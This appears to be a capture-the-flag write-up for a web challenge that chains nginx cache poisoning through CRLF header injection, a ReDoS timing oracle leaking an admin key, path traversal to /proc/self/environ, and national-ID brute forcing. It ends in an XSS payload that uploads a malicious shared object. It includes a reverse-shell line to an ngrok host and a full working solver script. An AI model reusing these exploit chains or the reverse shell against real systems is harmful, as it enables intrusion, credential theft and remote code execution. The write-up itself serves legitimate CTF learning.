We seem to have two pieces of cache-related functionality, but they conflict with each other.
In the FastAPI (Starlette) app, we have:
@app.middleware("http")
async def add_no_cache_headers(request: Request, call_next):
response = await call_next(request)
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = '0'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
return response
Meanwhile in nginx:
location /api/ {
proxy_pass http://localhost:5000/;
proxy_cache mycache;
proxy_cache_valid any 10s;
proxy_ignore_headers Set-Cookie;
proxy_cache_min_uses 1;
proxy_cache_key "$scheme$proxy_host$uri";
add_header X-Cache-Status $upstream_cache_status always;
# add_header Content-Security-Policy "default-src 'none'; script-src 'none'; style-src 'none'; img-src 'none'; connect-src 'none'; font-src 'none';" always;
}
We also have an interesting /api/health endpoint. It is only accessible if you send the ADMIN_KEY cookie. Both the template name and the request are set after our input is merged in, so they overwrite whatever we supply and we seemingly can't control them:
@app.get("/health")
async def health(request: Request, test: str = '{"context": {"Check": "Test"}}'):
if request.cookies.get("ADMIN_KEY", "") != environ.get("ADMIN_KEY", ""):
return Response(content="Unauthorized", status_code=401)
try:
test = json.loads(test)
except:
test = {"context": {"Check": "Test"}}
context = test | {"name": "health.html", "request": request}
if "headers" not in context:
context["headers"] = {}
context["headers"]["Content-Security-Policy"] = (
"default-src 'self'; "
"style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdn.tailwindcss.com; "
"font-src 'self' https://fonts.gstatic.com; "
"img-src 'self' data:; "
"object-src 'none'; "
"base-uri 'self'; "
"form-action 'self';"
)
return templates.TemplateResponse(**context)
Inspecting Starlette's TemplateResponse class, we can see it takes an extra parameter, headers:
We found a header injection that allows control of the entire response body! I thought this was a 0-day at first, but attempting the same thing on a fresh install of Starlette 0.52.1 fails:
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\starlette\_exception_handler.py", line 39, in sender
await send(message)
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\starlette\middleware\errors.py", line 161, in _send
await send(message)
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\uvicorn\protocols\http\h11_impl.py", line 491, in send
response = h11.Response(status_code=status, headers=headers, reason=reason)
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\h11\_events.py", line 151, in __init__
self, "headers", normalize_and_validate(headers, _parsed=_parsed)
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\h11\_headers.py", line 165, in normalize_and_validate
validate(_field_name_re, name, "Illegal header name {!r}", name)
~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\adham\Desktop\sandbox\0xl4ugh-ctf-2026\starlette_poc\.venv\Lib\site-packages\h11\_util.py", line 91, in validate
raise LocalProtocolError(msg)
h11._util.LocalProtocolError: Illegal header name b'a: b\r\n\r\naaaa'
There is some validation being done (as it should be):
def normalize_and_validate(
headers: Union[Headers, HeaderTypes], _parsed: bool = False
) -> Headers:
new_headers = []
seen_content_length = None
saw_transfer_encoding = False
for name, value in headers:
# For headers coming out of the parser, we can safely skip some steps,
# because it always returns bytes and has already run these regexes
# over the data:
if not _parsed:
name = bytesify(name)
value = bytesify(value)
validate(_field_name_re, name, "Illegal header name {!r}", name)
validate(_field_value_re, value, "Illegal header value {!r}", value)
assert isinstance(name, bytes)
assert isinstance(value, bytes)
I compared the two implementations; they are identical, but the behavior is different. I must be missing something:
# https://svn.tools.ietf.org/svn/wg/httpbis/specs/rfc7230.html#rule.token.separators
# token = 1*tchar
#
# tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*"
# / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~"
# / DIGIT / ALPHA
# ; any VCHAR, except delimiters
token = r"[-!#$%&'*+.^_`|~0-9a-zA-Z]+"
We can come back to this later.
Let's create our .so payload as per suinam's article on dirty arbitrary file writes
Inside the docker environment, we add a reverse shell payload:
# /app/utils/auth.py inside create_token function which gets imported by bot.py when it runs
__import__('os').system('/bin/bash -c "HOME=/home/appuser /bin/bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/10066 0>&1"')
$ cythonize -i /app/utils/auth.py
$ mv /app/utils/auth.cpython-311-x86_64-linux-gnu.so /app/utils/auth.so
$ docker cp 65d:/app/utils/auth.so ./auth.so
Successfully copied 523kB to .\auth.so
$ scp ./auth.so root@myserver.com:/var/www/html/auth.so
auth.so
For some reason, my reverse shell kept failing. I realized it was because there was no HOME variable and bash -i was automatically trying to open /root/.bashrc. We changed the command to include HOME= beforehand. And:
ps aux
# the PID of init.sh, immediate child process of supervisord
cat /proc/8/environ
PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=clinicFLAG=0xL4ugh{GG_y0u_ar3_a_g00d_pentester$!!_9209306021bfc53db53747518cf28004}LANG=C.UTF-8GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696DPYTHON_VERSION=3.11.14PYTHON_SHA256=8d3ed8ec5c88c1c95f5e558612a725450d2452813ddad5e58fdb1a53b1209b78PYPPETEER_HOME=/home/appuser/.local/share/pyppeteerHOME=/rootSUPERVISOR_ENABLED=1SUPERVISOR_PROCESS_NAME=appSUPERVISOR_GROUP_NAME=appappuser@clinic:
My solver:
import httpx
from itertools import product
import json
import random
from concurrent.futures import ThreadPoolExecutor, as_completed
from string import digits
# Target base URL. The second assignment wins, so the remote instance is the
# one attacked; comment it out to run against a local deployment instead.
BASE_URL = "http://localhost"
BASE_URL = "http://challenges2.ctf.sd:33484"
# Random 14-digit string. In the code shown here it is only printed below.
rand_password = "".join(random.choices(digits, k=14))
# Password sent by login(). Only the last uncommented assignment takes effect.
password = "35657248011758"
password = "30403191501329" # bruteforced remote patient password
# password = "30508011601589" # local pass
print(f"{rand_password = }")
print(f"{password = }")
def validate_egyptian_id(national_id):
    """Return the Luhn check digit for a string of decimal digits.

    Despite its name, this function does not validate anything: it computes
    the digit that has to be appended to ``national_id`` so that the
    resulting number passes Luhn's algorithm.

    Args:
        national_id: Decimal digits *without* the trailing check digit.

    Returns:
        The check digit as an ``int`` in the range 0-9.

    Raises:
        ValueError: If ``national_id`` contains a non-digit character.
    """
    total = 0
    # Count positions from the rightmost digit; positions 0, 2, 4, ... are
    # the ones Luhn doubles when the check digit is still missing.
    for position, char in enumerate(reversed(national_id)):
        value = int(char)
        if position % 2 == 0:
            value *= 2
            if value > 9:
                # Same effect as summing the two digits of the product.
                value -= 9
        total += value
    return (10 - total % 10) % 10
def register(c: httpx.Client, user: dict | None = None):
    """POST a registration request for the default ``aelmo`` account.

    Args:
        c: Client whose ``post`` method is used to reach ``/api/register``.
        user: Optional field overrides merged on top of the default payload.
            ``None`` (the default) or an empty dict sends the defaults as-is.

    Returns:
        Whatever ``c.post`` returns (the HTTP response).
    """
    payload = {
        "name": "aelmo",
        "username": "aelmo",
        "national_id": "1" * 14,
        "email": "aelmo@aelmo.com",
        "date_of_birth": "1111-11-11",
        "governrate": "Minya",
        "gender": 1,
    }
    # `None` instead of a shared `{}` default avoids the mutable-default trap.
    if user:
        payload |= user
    return c.post("/api/register", json=payload)
def login(c: httpx.Client, user: dict | None = None):
    """POST a login request, by default as ``aelmo`` with the module ``password``.

    Args:
        c: Client whose ``post`` method is used to reach ``/api/login``.
        user: Optional field overrides (e.g. ``{"username": ...}``) merged on
            top of the default credentials. ``None`` or ``{}`` keeps defaults.

    Returns:
        Whatever ``c.post`` returns (the HTTP response).
    """
    credentials = {
        "username": "aelmo",
        "password": password,
    }
    # `None` instead of a shared `{}` default avoids the mutable-default trap.
    if user:
        credentials |= user
    return c.post("/api/login", json=credentials)
def _login(national_id):
    """Try ``national_id`` as the password of ``patient_test``.

    A fresh client is opened per attempt, so the function can be run from
    several worker threads without sharing a session.

    Returns:
        ``(True, national_id, response)`` when the login is accepted (HTTP 302
        or an ``auth`` cookie is set), ``(False, national_id, None)`` when it
        is rejected, and ``(False, national_id, error_text)`` when the request
        itself raised.
    """
    credentials = {"username": "patient_test", "password": national_id}
    try:
        with httpx.Client(base_url=BASE_URL, timeout=10) as session:
            reply = session.post("/api/login", json=credentials)
            accepted = reply.status_code == 302 or "auth" in reply.cookies
            if not accepted:
                return (False, national_id, None)
            return (True, national_id, reply)
    except Exception as err:
        # Best effort: any failure just counts as an unsuccessful attempt.
        return (False, national_id, str(err))
def update(c: httpx.Client):
    """Rename the logged-in profile to a path-traversal username.

    The new username is ``../../../proc/self/environ``; the rest of the script
    then logs in under that name and reads ``/api/userdata`` (presumably the
    server builds a file path from the username - confirm against the target).

    Returns:
        Whatever ``c.post`` returns (the HTTP response).
    """
    profile = {
        "name": "aelmo",
        "username": "../../../proc/self/environ",
        "email": "aelmo@aelmo.com",
    }
    return c.post("/api/profile", json=profile)
def key_prefix_exists(c, known_prefix, threshold: float = 2.0) -> bool:
    """Timing oracle: report whether ``ADMIN_KEY`` starts with ``known_prefix``.

    Sends a regex in the ``Illness`` field of ``/api/send-message``. The
    look-ahead only succeeds when the matched text contains
    ``ADMIN_KEY=<known_prefix>``; the nested quantifiers that follow are a
    ReDoS gadget, so a correct prefix shows up as a slow response.
    (Presumably the server evaluates the pattern against data containing the
    process environment - confirm against the target.)

    Args:
        c: Client whose ``post`` method is used for the request.
        known_prefix: Candidate prefix of the key. It is interpolated into
            the regex unescaped, so it must not contain regex metacharacters.
        threshold: Response time in seconds above which the prefix is
            considered correct.

    Returns:
        ``True`` if the response took longer than ``threshold`` seconds.
    """
    r = c.post(
        "/api/send-message",
        json={
            "message": "hello",
            "Illness": f"(?=.*ADMIN_KEY={known_prefix}.*)((.*)*)*!",
        },
    )
    return r.elapsed.total_seconds() > threshold
def brute_login():
    """Brute-force the password of ``patient_test`` over all candidate IDs.

    Every ID produced by ``generate_national_id()`` is tried through
    ``_login`` on a pool of 20 worker threads.

    Returns:
        The first national ID that logs in successfully, or ``None`` if no
        candidate works.
    """
    tested = 0
    with ThreadPoolExecutor(max_workers=20) as executor:
        futures = [
            executor.submit(_login, national_id)
            for national_id in generate_national_id()
        ]
        for future in as_completed(futures):
            success, nid, _ = future.result()
            tested += 1
            if tested % 100 == 0:
                print(f"[*] Tested {tested} national IDs...")
            if success:
                print(f"[+] FOUND! National ID: {nid}")
                # Leaving the `with` block waits for outstanding work, so
                # drop every attempt that has not started yet; otherwise the
                # whole candidate space is still sent after a hit.
                for pending in futures:
                    pending.cancel()
                return nid
    print(f"[-] Not found after {tested} attempts")
    return None
# Known facts about the target patient used to narrow the ID search space:
#   date of birth: 2004-03-19
#   governorate:   kafr-el-sheikh
#   gender:        female (presumably why the digit before the check digit
#                  is restricted to even values - confirm)
digits = list("0123456789")
even = list("02468")
def generate_national_id():
    """Yield every candidate 14-digit national ID for the target patient.

    Each candidate is the fixed prefix ``304031915``, three free digits, one
    even digit, and the check digit computed by ``validate_egyptian_id``.
    Candidates come out in ascending order of the four free digits.
    """
    fixed_prefix = "304031915"
    for d1, d2, d3, last in product(digits, digits, digits, even):
        body = f"{fixed_prefix}{d1}{d2}{d3}{last}"
        yield f"{body}{validate_egyptian_id(body)}"
# One-off brute force of patient_test's national ID. The result is already
# hard-coded in `password`, so this stays disabled.
# result = brute_login()
# if result:
#     print(f"\n[+] Valid credentials: patient_test:{result}")

c = httpx.Client(base_url=BASE_URL, timeout=30)

# Step 1: log in as patient_test and rename the account to the traversal path.
try:
    print("[*] login")
    r = login(c, {"username": "patient_test"})
    assert r.status_code == 302, r.text
    assert c.cookies.get("auth") is not None
    print("[*] updating")
    r = update(c)
    assert r.json()["status"] == "success", r.text
    print("[+] update complete")
except Exception:
    # Deliberately broad: on a re-run the account has already been renamed,
    # so a failed login/update here is expected rather than fatal.
    print("[!] couldnt find patient_test, assuming it was updated")

# Step 2: log in under the renamed account and dump its user data.
r = login(c, {"username": "../../../proc/self/environ"})
assert r.status_code == 302, r.text
assert c.cookies.get("auth") is not None
r = c.get("/api/userdata")
print(r.text)
print("[+] login complete")

# Step 3: obtain ADMIN_KEY. Set it to "" to leak it again via the ReDoS oracle.
admin_key = "b0c9070a5bce6b3a7af5fe940e4b874a"
# admin_key = "873f7da2070816a04c3627418a42c30c" # local
if not admin_key:
    print("[*] leaking admin_key..")
    while len(admin_key) < 32:
        for char in "0123456789abcdef":
            if key_prefix_exists(c, admin_key + char):
                admin_key = admin_key + char
                print("\b" * (len(admin_key) - 1) + admin_key, end="", flush=True)
                break
        else:
            # No hex digit extended the prefix; without this the outer loop
            # would retry the same sixteen candidates forever.
            raise RuntimeError(
                f"timing oracle found no next character after {admin_key!r}"
            )
    print()
assert len(admin_key) == 32
print(f"[+] leaked {admin_key = }")

# Step 4: poison nginx's cached /api/health response. The injected header name
# carries a CRLF sequence, so everything after it becomes the response body.
print("[*] poisoning /api/health cache via header injection")
xss = """<script>fetch("/api/upload-document",{method:"POST",body:JSON.stringify({"file_url":"\\u00a0http://myserver.com/auth.so","filename":"../../../app/utils/auth.so"}),headers:{"content-type":"application/json"},credentials:"include"})</script>"""
template_object = {
    "context": {"Check": ""},
    "headers": {"content-type: text/html\r\ncache-control: max-age=10\r\n\r\n": xss},
}
r = c.get(
    "/api/health",
    params={"test": json.dumps(template_object)},
    cookies={"ADMIN_KEY": admin_key},
)

# Request again without the admin cookie: a cache HIT shows that the poisoned
# response is what nginx now serves to everyone.
r = c.get("/api/health")
assert r.headers.get("x-cache-status") == "HIT"
print("--- headers ---")
for k in r.headers:
    print(f"{k}: {r.headers[k]}")
print("--- endheaders ---")
print("--- body ---")
print(r.text)
print("--- endbody ---")

# First bot run: presumably the bot loads the poisoned page, whose script
# uploads the malicious .so into /app/utils.
r = c.get("/api/bot")
# Second bot run: presumably makes the bot import the planted .so.
r = c.get("/api/bot")
Great article about ReDoS:
0xL4ugh{GG_y0u_ar3_a_g00d_pentester$!!_]